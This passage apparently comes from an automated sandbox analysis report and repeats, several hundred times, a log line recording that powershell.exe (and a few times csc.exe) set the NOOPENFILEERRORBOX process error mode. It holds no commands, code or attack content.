        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
